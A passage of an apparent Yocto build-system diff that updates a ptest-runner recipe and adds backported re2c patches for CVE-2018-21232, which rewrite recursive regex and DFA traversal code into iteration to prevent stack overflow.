2DESCRIPTION = "Popt is a C library for parsing command line parameters. Popt was heavily influenced by the getopt() and getopt_long() functions, but it improves on them by allowing more powerful argument expansion. Popt can parse arbitrary argv[] style arrays and automatically set variables based on command line arguments."
2HOMEPAGE = "http://rpm5.org/" 3HOMEPAGE = "http://rpm5.org/"
3SECTION = "libs" 4SECTION = "libs"
4 5
diff --git a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
index 8b9938f572..3401b7b39e 100644
--- a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
+++ b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe"
10SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd" 10SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd"
11PV .= "+git${SRCPV}" 11PV .= "+git${SRCPV}"
12 12
13SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \ 13SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \
14" 14"
15UPSTREAM_VERSION_UNKNOWN = "1" 15UPSTREAM_VERSION_UNKNOWN = "1"
16 16
@@ -27,3 +27,5 @@ do_compile () {
27do_install () { 27do_install () {
28 install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner 28 install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner
29} 29}
30
31RDEPENDS_${PN}_append_libc-glibc = " libgcc"
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
new file mode 100644
index 0000000000..b7dcaefad3
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
@@ -0,0 +1,347 @@
1From fd634998f813340768c333cdad638498602856e5 Mon Sep 17 00:00:00 2001
2From: Ulya Trofimovich <skvadrik@gmail.com>
3Date: Tue, 21 Apr 2020 21:28:32 +0100
4Subject: [PATCH] Rewrite recursion into iteration (Tarjan's SCC algorithm and
5 YYFILL states).
6
7This is to avoid stack overflow on large RE (especially on instrumented
8builds that have larger stack frames, like AddressSanitizer).
9
10Stack overflow reported by Agostino Sarubbo.
11Related to #219 "overflow-1.re test fails on system with small stack".
12
13Upstram-Status: Backport:
14https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5
15
16CVE: CVE-2018-21232
17
18Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
19---
20diff --git a/src/dfa/fillpoints.cc b/src/dfa/fillpoints.cc
21--- a/src/dfa/fillpoints.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
22+++ b/src/dfa/fillpoints.cc (date 1646929180243)
23@@ -5,151 +5,186 @@
24
25 #include "src/dfa/dfa.h"
26
27-namespace re2c
28-{
29+
30+/*
31+ * note [finding strongly connected components of DFA]
32+ *
33+ * A slight modification of Tarjan's algorithm.
34+ *
35+ * The algorithm traverses the DFA in depth-first order. It maintains a stack
36+ * of states that have already been visited but haven't been assigned to an SCC
37+ * yet. For each state the algorithm calculates 'lowlink': index of the highest
38+ * ancestor state reachable in one step from a descendant of this state.
39+ * Lowlink is used to determine when a set of states should be popped off stack
40+ * into a new SCC.
41+ *
42+ * We use lowlink to hold different kinds of information:
43+ * - values in range [0 .. stack size] mean that the state is on stack (a
44+ * link to a state with the smallest index reachable from this one)
45+ * - SCC_UND means that this state has not been visited yet
46+ * - SCC_INF means that this state has already been popped off stack
47+ *
48+ * We use stack size (rather than topological sort index) as a unique index of
49+ * the state on stack. This is safe because the indices of states on stack are
50+ * unique and less than the indices of states that have been popped off stack
51+ * (SCC_INF).
52+ */
53+
54+namespace re2c {
55+ namespace {
56
57-static const size_t SCC_INF = std::numeric_limits<size_t>::max();
58-static const size_t SCC_UND = SCC_INF - 1;
59+ static const size_t SCC_INF = std::numeric_limits<size_t>::max();
60+ static const size_t SCC_UND = SCC_INF - 1;
61
62-static bool loopback(size_t node, size_t narcs, const size_t *arcs)
63-{
64- for (size_t i = 0; i < narcs; ++i)
65- {
66- if (arcs[i] == node)
67- {
68- return true;
69- }
70- }
71- return false;
72-}
73+ static bool loopback(size_t state, size_t narcs, const size_t *arcs)
74+ {
75+ for (size_t i = 0; i < narcs; ++i) {
76+ if (arcs[i] == state) return true;
77+ }
78+ return false;
79+ }
80
81-/*
82- * node [finding strongly connected components of DFA]
83- *
84- * A slight modification of Tarjan's algorithm.
85- *
86- * The algorithm walks graph in deep-first order. It maintains a stack
87- * of nodes that have already been visited but haven't been assigned to
88- * SCC yet. For each node the algorithm calculates 'lowlink': index of
89- * the highest ancestor node reachable in one step from a descendant of
90- * the node. Lowlink is used to determine when a set of nodes should be
91- * popped off the stack into a new SCC.
92- *
93- * We use lowlink to hold different kinds of information:
94- * - values in range [0 .. stack size] mean that this node is on stack
95- * (link to a node with the smallest index reachable from this one)
96- * - SCC_UND means that this node has not been visited yet
97- * - SCC_INF means that this node has already been popped off stack
98- *
99- * We use stack size (rather than topological sort index) as unique index
100- * of a node on stack. This is safe because indices of nodes on stack are
101- * still unique and less than indices of nodes that have been popped off
102- * stack (SCC_INF).
103- *
104- */
105-static void scc(
106- const dfa_t &dfa,
107- std::stack<size_t> &stack,
108- std::vector<size_t> &lowlink,
109- std::vector<bool> &trivial,
110- size_t i)
111-{
112- const size_t link = stack.size();
113- lowlink[i] = link;
114- stack.push(i);
115+ struct StackItem {
116+ size_t state; // current state
117+ size_t symbol; // next arc to be visited in this state
118+ size_t link; // Tarjan's "lowlink"
119+ };
120+
121+// Tarjan's algorithm
122+ static void scc(const dfa_t &dfa, std::vector<bool> &trivial,
123+ std::vector<StackItem> &stack_dfs)
124+ {
125+ std::vector<size_t> lowlink(dfa.states.size(), SCC_UND);
126+ std::stack<size_t> stack;
127+
128+ StackItem x0 = {0, 0, 0};
129+ stack_dfs.push_back(x0);
130+
131+ while (!stack_dfs.empty()) {
132+ const size_t i = stack_dfs.back().state;
133+ size_t c = stack_dfs.back().symbol;
134+ size_t link = stack_dfs.back().link;
135+ stack_dfs.pop_back();
136+
137+ const size_t *arcs = dfa.states[i]->arcs;
138+
139+ if (c == 0) {
140+ // DFS recursive enter
141+ //DASSERT(lowlink[i] == SCC_UND);
142+ link = lowlink[i] = stack.size();
143+ stack.push(i);
144+ }
145+ else {
146+ // DFS recursive return (from one of successor states)
147+ const size_t j = arcs[c - 1];
148+ //DASSERT(lowlink[j] != SCC_UND);
149+ lowlink[i] = std::min(lowlink[i], lowlink[j]);
150+ }
151
152- const size_t *arcs = dfa.states[i]->arcs;
153- for (size_t c = 0; c < dfa.nchars; ++c)
154- {
155- const size_t j = arcs[c];
156- if (j != dfa_t::NIL)
157- {
158- if (lowlink[j] == SCC_UND)
159- {
160- scc(dfa, stack, lowlink, trivial, j);
161- }
162- if (lowlink[j] < lowlink[i])
163- {
164- lowlink[i] = lowlink[j];
165- }
166- }
167- }
168+ // find the next successor state that hasn't been visited yet
169+ for (; c < dfa.nchars; ++c) {
170+ const size_t j = arcs[c];
171+ if (j != dfa_t::NIL) {
172+ if (lowlink[j] == SCC_UND) {
173+ break;
174+ }
175+ lowlink[i] = std::min(lowlink[i], lowlink[j]);
176+ }
177+ }
178
179- if (lowlink[i] == link)
180- {
181- // SCC is non-trivial (has loops) iff it either:
182- // - consists of multiple nodes (they all must be interconnected)
183- // - consists of single node which loops back to itself
184- trivial[i] = i == stack.top()
185- && !loopback(i, dfa.nchars, arcs);
186+ if (c < dfa.nchars) {
187+ // recurse into the next successor state
188+ StackItem x1 = {i, c + 1, link};
189+ stack_dfs.push_back(x1);
190+ StackItem x2 = {arcs[c], 0, SCC_UND};
191+ stack_dfs.push_back(x2);
192+ }
193+ else if (lowlink[i] == link) {
194+ // all successors have been visited
195+ // SCC is non-trivial (has loops) if either:
196+ // - it contains multiple interconnected states
197+ // - it contains a single self-looping state
198+ trivial[i] = i == stack.top() && !loopback(i, dfa.nchars, arcs);
199
200- size_t j;
201- do
202- {
203- j = stack.top();
204- stack.pop();
205- lowlink[j] = SCC_INF;
206- }
207- while (j != i);
208- }
209-}
210+ for (;;) {
211+ const size_t j = stack.top();
212+ stack.pop();
213+ lowlink[j] = SCC_INF;
214+ if (i == j) break;
215+ }
216+ }
217+ }
218+ }
219
220-static void calc_fill(
221- const dfa_t &dfa,
222- const std::vector<bool> &trivial,
223- std::vector<size_t> &fill,
224- size_t i)
225-{
226- if (fill[i] == SCC_UND)
227- {
228- fill[i] = 0;
229- const size_t *arcs = dfa.states[i]->arcs;
230- for (size_t c = 0; c < dfa.nchars; ++c)
231- {
232- const size_t j = arcs[c];
233- if (j != dfa_t::NIL)
234- {
235- calc_fill(dfa, trivial, fill, j);
236- size_t max = 1;
237- if (trivial[j])
238- {
239- max += fill[j];
240- }
241- if (max > fill[i])
242- {
243- fill[i] = max;
244- }
245- }
246- }
247- }
248-}
249-
250-void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
251-{
252- const size_t size = dfa.states.size();
253-
254- // find DFA states that belong to non-trivial SCC
255- std::stack<size_t> stack;
256- std::vector<size_t> lowlink(size, SCC_UND);
257- std::vector<bool> trivial(size, false);
258- scc(dfa, stack, lowlink, trivial, 0);
259-
260- // for each DFA state, calculate YYFILL argument:
261- // maximal path length to the next YYFILL state
262- fill.resize(size, SCC_UND);
263- calc_fill(dfa, trivial, fill, 0);
264+ static void calc_fill(const dfa_t &dfa, const std::vector<bool> &trivial,
265+ std::vector<StackItem> &stack_dfs, std::vector<size_t> &fill)
266+ {
267+ const size_t nstates = dfa.states.size();
268+ fill.resize(nstates, SCC_UND);
269+
270+ StackItem x0 = {0, 0, SCC_INF};
271+ stack_dfs.push_back(x0);
272+
273+ while (!stack_dfs.empty()) {
274+ const size_t i = stack_dfs.back().state;
275+ size_t c = stack_dfs.back().symbol;
276+ stack_dfs.pop_back();
277+
278+ const size_t *arcs = dfa.states[i]->arcs;
279+
280+ if (c == 0) {
281+ // DFS recursive enter
282+ if (fill[i] != SCC_UND) continue;
283+ fill[i] = 0;
284+ }
285+ else {
286+ // DFS recursive return (from one of successor states)
287+ const size_t j = arcs[c - 1];
288+ //DASSERT(fill[i] != SCC_UND && fill[j] != SCC_UND);
289+ fill[i] = std::max(fill[i], 1 + (trivial[j] ? fill[j] : 0));
290+ }
291+
292+ // find the next successor state that hasn't been visited yet
293+ for (; c < dfa.nchars; ++c) {
294+ const size_t j = arcs[c];
295+ if (j != dfa_t::NIL) break;
296+ }
297+
298+ if (c < dfa.nchars) {
299+ // recurse into the next successor state
300+ StackItem x1 = {i, c + 1, SCC_INF};
301+ stack_dfs.push_back(x1);
302+ StackItem x2 = {arcs[c], 0, SCC_INF};
303+ stack_dfs.push_back(x2);
304+ }
305+ }
306
307- // The following states must trigger YYFILL:
308- // - inital state
309- // - all states in non-trivial SCCs
310- // for other states, reset YYFILL argument to zero
311- for (size_t i = 1; i < size; ++i)
312- {
313- if (trivial[i])
314- {
315- fill[i] = 0;
316- }
317- }
318-}
319+ // The following states must trigger YYFILL:
320+ // - inital state
321+ // - all states in non-trivial SCCs
322+ // for other states, reset YYFILL argument to zero
323+ for (size_t i = 1; i < nstates; ++i) {
324+ if (trivial[i]) {
325+ fill[i] = 0;
326+ }
327+ }
328+ }
329
330+ } // anonymous namespace
331+
332+ void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
333+ {
334+ const size_t nstates = dfa.states.size();
335+ std::vector<bool> trivial(nstates, false);
336+ std::vector<StackItem> stack_dfs;
337+ stack_dfs.reserve(nstates);
338+
339+ // find DFA states that belong to non-trivial SCC
340+ scc(dfa, trivial, stack_dfs);
341+
342+ // for each DFA state, calculate YYFILL argument:
343+ // maximal path length to the next YYFILL state
344+ calc_fill(dfa, trivial, stack_dfs, fill);
345+ }
346+
347 } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
new file mode 100644
index 0000000000..820a6decbc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
@@ -0,0 +1,243 @@
1From 7b5643476bd99c994c4f51b8143f942982d85521 Mon Sep 17 00:00:00 2001
2From: Ulya Trofimovich <skvadrik@gmail.com>
3Date: Wed, 22 Apr 2020 22:37:24 +0100
4Subject: [PATCH] Rewrite recursion into iteration (fixed tags computation).
5
6This is to avoid stack overflow on large RE (especially on instrumented
7builds that have larger stack frames, like AddressSanitizer).
8
9Partial fix for #219 "overflow-1.re test fails on system with small stack".
10
11Upstream-Stauts: Backport:
12https://github.com/skvadrik/re2c/commit/7b5643476bd99c994c4f51b8143f942982d85521
13
14CVE: CVE-2018-21232
15
16Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
17---
18diff --git a/src/re/tag.cc b/src/re/tag.cc
19--- a/src/re/tag.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
20+++ b/src/re/tag.cc (date 1646986908580)
21@@ -6,7 +6,7 @@
22 {
23
24 const size_t Tag::RIGHTMOST = std::numeric_limits<size_t>::max();
25-const size_t Tag::VARDIST = std::numeric_limits<size_t>::max();
26+const uint32_t Tag::VARDIST = std::numeric_limits<uint32_t>::max();
27 const size_t Tag::FICTIVE = Tag::RIGHTMOST - 1;
28
29 } // namespace re2c
30
31
32diff --git a/src/re/tag.h b/src/re/tag.h
33--- a/src/re/tag.h (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
34+++ b/src/re/tag.h (date 1646986922376)
35@@ -19,7 +19,7 @@
36 struct Tag
37 {
38 static const size_t RIGHTMOST;
39- static const size_t VARDIST;
40+ static const uint32_t VARDIST;
41 static const size_t FICTIVE;
42
43 const std::string *name;
44
45
46diff --git a/src/re/fixed_tags.cc b/src/re/fixed_tags.cc
47--- a/src/re/fixed_tags.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
48+++ b/src/re/fixed_tags.cc (date 1646991137317)
49@@ -7,78 +7,131 @@
50 #include "src/re/tag.h"
51
52 namespace re2c {
53+namespace {
54
55 /* note [fixed and variable tags]
56 *
57- * If distance between two tags is constant (equal for all strings that
58- * match the given regexp), then lexer only needs to track one of them:
59- * the second tag equals the first tag plus static offset.
60+ * If distance between two tags is constant (equal for all strings that match
61+ * the given regexp), then lexer only needs to track one of them: the second
62+ * tag equals the first tag plus static offset.
63 *
64- * However, this optimization is applied only to tags in top-level
65- * concatenation, because other tags may be uninitialized and we don't
66- * want to mess with conditional calculation of fixed tags.
67- *
68+ * This optimization is applied only to tags in top-level concatenation,
69+ * because in other cases the base tag may be NULL, and the calculation of
70+ * the fixed tag value is not as simple as substracting a fixed offset.
71 * Furthermore, fixed tags are fobidden with generic API because it cannot
72- * express fixed offsets.
73- *
74- * Tags with history also cannot be fixed.
75+ * express fixed offsets. M-tags (with history) also cannot be fixed.
76 *
77 * Another special case is fictive tags (those that exist only to impose
78- * hierarchical laws of POSIX disambiguation). We treat them as fixed
79- * in order to suppress code generation.
80+ * hierarchical laws of POSIX disambiguation). We treat them as fixed in order
81+ * to suppress code generation.
82 */
83
84-static void find_fixed_tags(RE *re, std::vector<Tag> &tags,
85- size_t &dist, size_t &base, bool toplevel)
86+struct StackItem {
87+ RE *re; // current sub-RE
88+ uint32_t dist; // distance backup for alternative, unused for other RE
89+ uint8_t succ; // index of the next successor to be visited
90+ bool toplevel; // if this sub-RE is in top-level concatenation
91+};
92+
93+static void find_fixed_tags(RESpec &spec, std::vector<StackItem> &stack, RE *re0)
94 {
95- switch (re->type) {
96- case RE::NIL: break;
97- case RE::SYM:
98- if (dist != Tag::VARDIST) ++dist;
99- break;
100- case RE::ALT: {
101- size_t d1 = dist, d2 = dist;
102- find_fixed_tags(re->alt.re1, tags, d1, base, false);
103- find_fixed_tags(re->alt.re2, tags, d2, base, false);
104- dist = (d1 == d2) ? d1 : Tag::VARDIST;
105- break;
106- }
107- case RE::CAT:
108- find_fixed_tags(re->cat.re2, tags, dist, base, toplevel);
109- find_fixed_tags(re->cat.re1, tags, dist, base, toplevel);
110- break;
111- case RE::ITER:
112- find_fixed_tags(re->iter.re, tags, dist, base, false);
113- dist = Tag::VARDIST;
114- break;
115- case RE::TAG: {
116- // see note [fixed and variable tags]
117- Tag &tag = tags[re->tag.idx];
118- if (fictive(tag)) {
119- tag.base = tag.dist = 0;
120- } else if (toplevel && dist != Tag::VARDIST && !history(tag)) {
121- tag.base = base;
122- tag.dist = dist;
123- } else if (toplevel) {
124- base = re->tag.idx;
125- dist = 0;
126- }
127- if (trailing(tag)) dist = 0;
128- break;
129- }
130- }
131+ static const uint32_t VARDIST = Tag::VARDIST;
132+ bool toplevel = spec.opts->input_api != INPUT_CUSTOM;
133+
134+ // base tag, intially the fake "rightmost tag" (the end of RE)
135+ size_t base = Tag::RIGHTMOST;
136+
137+ // the distance to the nearest top-level tag to the right (base tag)
138+ uint32_t dist = 0;
139+
140+ const StackItem i0 = {re0, VARDIST, 0, toplevel};
141+ stack.push_back(i0);
142+
143+ while (!stack.empty()) {
144+ const StackItem i = stack.back();
145+ stack.pop_back();
146+ RE *re = i.re;
147+
148+ if (re->type == RE::SYM) {
149+ if (dist != VARDIST) ++dist;
150+ }
151+ else if (re->type == RE::ALT) {
152+ if (i.succ == 0) {
153+ // save the current distance on stack (from the alternative end
154+ // to base) and recurse into the left sub-RE
155+ StackItem k = {re, dist, 1, i.toplevel};
156+ stack.push_back(k);
157+ StackItem j = {re->alt.re1, VARDIST, 0, false};
158+ stack.push_back(j);
159+ }
160+ else if (i.succ == 1) {
161+ // save the current distance on stack (from the left sub-RE to
162+ // base), reset distance to the distance popped from stack (from
163+ // the alternative end to base), recurse into the right sub-RE
164+ StackItem k = {re, dist, 2, i.toplevel};
165+ stack.push_back(k);
166+ StackItem j = {re->alt.re2, VARDIST, 0, false};
167+ stack.push_back(j);
168+ dist = i.dist;
169+ }
170+ else {
171+ // both sub-RE visited, compare the distance on stack (from the
172+ // left sub-RE to base) to the current distance (from the right
173+ // sub-RE to base), if not equal set variable distance
174+ dist = (i.dist == dist) ? i.dist : VARDIST;
175+ }
176+ }
177+ else if (re->type == RE::ITER) {
178+ if (i.succ == 0) {
179+ // recurse into the sub-RE
180+ StackItem k = {re, VARDIST, 1, i.toplevel};
181+ stack.push_back(k);
182+ StackItem j = {re->iter.re, VARDIST, 0, false};
183+ stack.push_back(j);
184+ }
185+ else {
186+ // sub-RE visited, assume unknown number of iterations
187+ // TODO: find precise distance for fixed repetition counter
188+ dist = VARDIST;
189+ }
190+ }
191+ else if (re->type == RE::CAT) {
192+ // the right sub-RE is pushed on stack after the left sub-RE and
193+ // visited earlier (because distance is computed from right to left)
194+ StackItem j1 = {re->cat.re1, VARDIST, 0, i.toplevel};
195+ stack.push_back(j1);
196+ StackItem j2 = {re->cat.re2, VARDIST, 0, i.toplevel};
197+ stack.push_back(j2);
198+ }
199+ else if (re->type == RE::TAG) {
200+ // see note [fixed and variable tags]
201+ Tag &tag = spec.tags[re->tag.idx];
202+ if (fictive(tag)) {
203+ tag.base = tag.dist = 0;
204+ }
205+ else if (i.toplevel && dist != VARDIST && !history(tag)) {
206+ tag.base = base;
207+ tag.dist = dist;
208+ }
209+ else if (i.toplevel) {
210+ base = re->tag.idx;
211+ dist = 0;
212+ }
213+ if (trailing(tag)) {
214+ dist = 0;
215+ }
216+ }
217+ }
218 }
219+
220+} // anonymous namespace
221
222-void find_fixed_tags(RESpec &spec)
223-{
224- const bool generic = spec.opts->input_api == INPUT_CUSTOM;
225- std::vector<RE*>::iterator
226- i = spec.res.begin(),
227- e = spec.res.end();
228- for (; i != e; ++i) {
229- size_t base = Tag::RIGHTMOST, dist = 0;
230- find_fixed_tags(*i, spec.tags, dist, base, !generic);
231- }
232-}
233+ void find_fixed_tags(RESpec &spec)
234+ {
235+ std::vector<StackItem> stack;
236+ for (std::vector<RE*>::iterator i = spec.res.begin(); i != spec.res.end(); ++i) {
237+ find_fixed_tags(spec, stack, *i);
238+ }
239+ }
240
241-} // namespace re2c
242+} // namespace re2c
243\ No newline at end of file
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
new file mode 100644
index 0000000000..f942e21cba
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
@@ -0,0 +1,156 @@
1From 4d9c809355b574f2a58eac119f5e076c48e4d1e2 Mon Sep 17 00:00:00 2001
2From: Ulya Trofimovich <skvadrik@gmail.com>
3Date: Thu, 23 Apr 2020 22:16:51 +0100
4Subject: [PATCH] Rewrite recursion into iteration (nullable RE).
5
6This is to avoid stack overflow on large RE (especially on instrumented
7builds that have larger stack frames, like AddressSanitizer).
8
9Partial fix for #219 "overflow-1.re test fails on system with small stack".
10
11Upstream-Status: Backport:
12https://github.com/skvadrik/re2c/commit/4d9c809355b574f2a58eac119f5e076c48e4d1e2
13
14CVE: CVE-2018-21232
15
16Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
17---
18diff --git a/src/re/nullable.cc b/src/re/nullable.cc
19--- a/src/re/nullable.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
20+++ b/src/re/nullable.cc (date 1647253886226)
21@@ -9,43 +9,100 @@
22 #include "src/re/tag.h"
23
24 namespace re2c {
25+ namespace {
26+
27+ struct StackItem {
28+ const RE *re; // current sub-RE
29+ uint8_t succ; // index of the next sucessor to be visited
30+ };
31
32-static bool nullable(const RESpec &spec, const RE *re, bool &trail)
33-{
34- if (trail) return true;
35+ static bool nullable(const RESpec &spec, std::vector<StackItem> &stack, const RE *re0)
36+ {
37+ // the "nullable" status of the last sub-RE visited by DFS
38+ bool null = false;
39
40- switch (re->type) {
41- case RE::NIL: return true;
42- case RE::SYM: return false;
43- case RE::ITER:
44- return nullable(spec, re->iter.re, trail);
45- case RE::TAG:
46- trail |= trailing(spec.tags[re->tag.idx]);
47- return true;
48- case RE::ALT:
49- return nullable(spec, re->alt.re1, trail)
50- || nullable(spec, re->alt.re2, trail);
51- case RE::CAT:
52- return nullable(spec, re->cat.re1, trail)
53- && nullable(spec, re->cat.re2, trail);
54- }
55- return false; /* unreachable */
56-}
57+ const StackItem i0 = {re0, 0};
58+ stack.push_back(i0);
59+
60+ while (!stack.empty()) {
61+ const StackItem i = stack.back();
62+ stack.pop_back();
63+
64+ const RE *re = i.re;
65+ if (re->type == RE::NIL) {
66+ null = true;
67+ }
68+ else if (re->type == RE::SYM) {
69+ null = false;
70+ }
71+ else if (re->type == RE::TAG) {
72+ null = true;
73
74-/*
75- * warn about rules that match empty string
76- * (including rules with nonempty trailing context)
77- * false positives on partially self-shadowed rules like [^]?
78- */
79-void warn_nullable(const RESpec &spec, const std::string &cond)
80-{
81- const size_t nre = spec.res.size();
82- for (size_t i = 0; i < nre; ++i) {
83- bool trail = false;
84- if (nullable(spec, spec.res[i], trail)) {
85- spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
86- }
87- }
88-}
89+ // Trailing context is always in top-level concatenation, and sub-RE
90+ // are visited from left to right. Since we are here, sub-RE to the
91+ // left of the trailing context is nullable (otherwise we would not
92+ // recurse into the right sub-RE), therefore the whole RE is nullable.
93+ if (trailing(spec.tags[re->tag.idx])) {
94+ //DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);
95+ stack.pop_back();
96+ break;
97+ }
98+ }
99+ else if (re->type == RE::ALT) {
100+ if (i.succ == 0) {
101+ // recurse into the left sub-RE
102+ StackItem k = {re, 1};
103+ stack.push_back(k);
104+ StackItem j = {re->alt.re1, 0};
105+ stack.push_back(j);
106+ }
107+ else if (!null) {
108+ // if the left sub-RE is nullable, so is alternative, so stop
109+ // recursion; otherwise recurse into the right sub-RE
110+ StackItem j = {re->alt.re2, 0};
111+ stack.push_back(j);
112+ }
113+ }
114+ else if (re->type == RE::CAT) {
115+ if (i.succ == 0) {
116+ // recurse into the left sub-RE
117+ StackItem k = {re, 1};
118+ stack.push_back(k);
119+ StackItem j = {re->cat.re1, 0};
120+ stack.push_back(j);
121+ }
122+ else if (null) {
123+ // if the left sub-RE is not nullable, neither is concatenation,
124+ // so stop recursion; otherwise recurse into the right sub-RE
125+ StackItem j = {re->cat.re2, 0};
126+ stack.push_back(j);
127+ }
128+ }
129+ else if (re->type == RE::ITER) {
130+ // iteration is nullable if the sub-RE is nullable
131+ // (zero repetitions is represented with alternative)
132+ StackItem j = {re->iter.re, 0};
133+ stack.push_back(j);
134+ }
135+ }
136+
137+ //DASSERT(stack.empty());
138+ return null;
139+ }
140+
141+ } // anonymous namespace
142+
143+// Warn about rules that match empty string (including rules with nonempty
144+// trailing context). False positives on partially self-shadowed rules like [^]?
145+ void warn_nullable(const RESpec &spec, const std::string &cond)
146+ {
147+ std::vector<StackItem> stack;
148+ const size_t nre = spec.res.size();
149+ for (size_t i = 0; i < nre; ++i) {
150+ if (nullable(spec, stack, spec.res[i])) {
151+ spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
152+ }
153+ }
154+ }
155
156 } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
new file mode 100644
index 0000000000..ee8d84b1bc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
@@ -0,0 +1,166 @@
1From 89be91f3df00657261870adbc590209fdb2bc405 Mon Sep 17 00:00:00 2001
2From: Ulya Trofimovich <skvadrik@gmail.com>
3Date: Thu, 23 Apr 2020 23:02:21 +0100
4Subject: [PATCH] Rewrite recursion into iteration (estimation of NFA size for
5 RE).
6
7This is to avoid stack overflow on large RE (especially on instrumented
8builds that have larger stack frames, like AddressSanitizer).
9
10Partial fix for #219 "overflow-1.re test fails on system with small stack".
11
12Upstram-Status: Backport:
13https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405
14
15CVE: CVE-2018-21232
16
17Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
18---
19diff --git a/src/nfa/estimate_size.cc b/src/nfa/estimate_size.cc
20--- a/src/nfa/estimate_size.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
21+++ b/src/nfa/estimate_size.cc (date 1647005399735)
22@@ -6,41 +6,113 @@
23 #include "src/re/re.h"
24
25 namespace re2c {
26+namespace {
27+
28+struct StackItem {
29+ const RE *re; // current sub-RE
30+ uint32_t size; // size of the sub-RE (only for alternative and concatenation)
31+ uint8_t succ; // index of the next sucessor to be visited
32+};
33
34-static size_t estimate(const RE *re)
35+static uint32_t estimate_re_size(const RE *re0, std::vector<StackItem> &stack)
36 {
37- switch (re->type) {
38- case RE::NIL: return 0;
39- case RE::SYM: return 1;
40- case RE::TAG: return 1;
41- case RE::ALT:
42- return estimate(re->alt.re1)
43- + estimate(re->alt.re2)
44- + 1;
45- case RE::CAT:
46- return estimate(re->cat.re1)
47- + estimate(re->cat.re2);
48- case RE::ITER: {
49- const size_t
50- iter = estimate(re->iter.re),
51- min = re->iter.min,
52- max = re->iter.max;
53- return max == AST::MANY
54- ? iter * min + 1
55- : iter * max + (max - min);
56- }
57- }
58- return 0; /* unreachable */
59-}
60+ // the estimated size of the last sub-RE visited by DFS
61+ uint32_t size = 0;
62+
63+ const StackItem i0 = {re0, 0, 0};
64+ stack.push_back(i0);
65+
66+ while (!stack.empty()) {
67+ const StackItem i = stack.back();
68+ stack.pop_back();
69+
70+ const RE *re = i.re;
71+ if (re->type == RE::NIL) {
72+ size = 0;
73+ }
74+ else if (re->type == RE::SYM || re->type == RE::TAG) {
75+ size = 1;
76+ }
77+ else if (re->type == RE::ALT) {
78+ if (i.succ == 0) {
79+ // recurse into the left sub-RE
80+ StackItem k = {re, 0, 1};
81+ stack.push_back(k);
82+ StackItem j = {re->alt.re1, 0, 0};
83+ stack.push_back(j);
84+ }
85+ else if (i.succ == 1) {
86+ // recurse into the right sub-RE
87+ StackItem k = {re, size, 2};
88+ stack.push_back(k);
89+ StackItem j = {re->alt.re2, 0, 0};
90+ stack.push_back(j);
91+ }
92+ else {
93+ // both sub-RE visited, recursive return
94+ size = i.size // left sub-RE (saved on stack)
95+ + size // right sub-RE (just visited by DFS)
96+ + 1; // additional state for alternative
97+ }
98+ }
99+ else if (re->type == RE::CAT) {
100+ if (i.succ == 0) {
101+ // recurse into the left sub-RE
102+ StackItem k = {re, 0, 1};
103+ stack.push_back(k);
104+ StackItem j = {re->cat.re1, 0, 0};
105+ stack.push_back(j);
106+ }
107+ else if (i.succ == 1) {
108+ // recurse into the right sub-RE
109+ StackItem k = {re, size, 2};
110+ stack.push_back(k);
111+ StackItem j = {re->cat.re2, 0, 0};
112+ stack.push_back(j);
113+ }
114+ else {
115+ // both sub-RE visited, recursive return
116+ size = i.size // left sub-RE (saved on stack)
117+ + size; // right sub-RE (just visited by DFS)
118+ }
119+ }
120+ else if (re->type == RE::ITER) {
121+ if (i.succ == 0) {
122+ // recurse into the sub-RE
123+ StackItem k = {re, 0, 1};
124+ stack.push_back(k);
125+ StackItem j = {re->iter.re, 0, 0};
126+ stack.push_back(j);
127+ }
128+ else {
129+ // sub-RE visited, recursive return
130+ const uint32_t min = re->iter.min, max = re->iter.max;
131+ size = max == AST::MANY
132+ ? size * min + 1
133+ : size * max + (max - min);
134+ }
135+ }
136+ }
137+
138+ //DASSERT(stack.empty());
139+ return size;
140+}
141+
142+} // anonymous namespace
143
144 size_t estimate_size(const std::vector<RE*> &res)
145 {
146- const size_t nre = res.size();
147- size_t size = nre - 1;
